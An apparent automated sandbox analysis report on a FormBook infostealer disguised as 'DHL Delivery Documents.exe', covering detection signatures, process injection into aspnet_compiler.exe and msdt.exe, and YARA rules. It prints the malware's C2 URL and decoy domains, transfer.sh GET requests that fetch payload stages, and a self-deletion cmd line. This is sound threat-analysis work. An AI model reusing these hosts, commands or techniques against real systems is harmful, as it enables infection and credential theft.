Windows Analysis Report
DHL Delivery Documents.exe

Overview

General Information

Sample Name: DHL Delivery Documents.exe
Analysis ID: 562120
MD5: 5bc8492c9f262d1f9840635b87edf9c5
SHA1: da867a8b837e43c91414ff46d239ab95b799d04b
SHA256: 7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • DHL Delivery Documents.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\DHL Delivery Documents.exe" MD5: 5BC8492C9F262D1F9840635B87EDF9C5)
    • aspnet_compiler.exe (PID: 5360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5848 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}
Source | Rule | Description | Author | Strings
00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source | Rule | Description | Author | Strings
7.0.aspnet_compiler.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.aspnet_compiler.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.0.aspnet_compiler.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
7.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.aspnet_compiler.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

System Summary

Source: Process started | Author: frack113 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Documents.exe" , ParentImage: C:\Users\user\Desktop\DHL Delivery Documents.exe, ParentProcessId: 4592, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5360
Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6760



AV Detection

Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}
Source: DHL Delivery Documents.exe | Virustotal: Detection: 30%
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: www.trabaho-academy.net/zqzw/ | Avira URL Cloud: Label: malware
Source: DHL Delivery Documents.exe | Joe Sandbox ML: detected
Source: 7.0.aspnet_compiler.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.aspnet_compiler.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.aspnet_compiler.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.aspnet_compiler.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
Source: DHL Delivery Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL | source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: BNCXGAS.pdb | source: DHL Delivery Documents.exe
Source: Binary string: wntdll.pdbUGP | source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdbBSJB | source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb | source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdt.pdb | source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop edi

Networking

Source: Malware configuration extractor | URLs: www.trabaho-academy.net/zqzw/
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1 Host: transfer.sh
Source: Joe Sandbox View | IP Address: 144.76.136.153
Source: Joe Sandbox View | IP Address: 144.76.136.153
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: DHL Delivery Documents.exe, 00000002.00000002.297310779.000000000146A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microf
Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros.
Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://transfer.sh
Source: DHL Delivery Documents.exe | String found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt
Source: DHL Delivery Documents.exe | String found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesL
Source: DHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtx
Source: DHL Delivery Documents.exe | String found in binary or memory: https://transfer.sh/get/mVKia7/BINCC.txt
Source: unknown | DNS traffic detected: queries for: transfer.sh
Source: global traffic | HTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1 Host: transfer.sh

E-Banking Fraud

Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: initial sampleStatic PE information: Filename: DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeStatic file information: Suspicious name
Matched rules (rule metadata given once; every source below matched both rules):
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
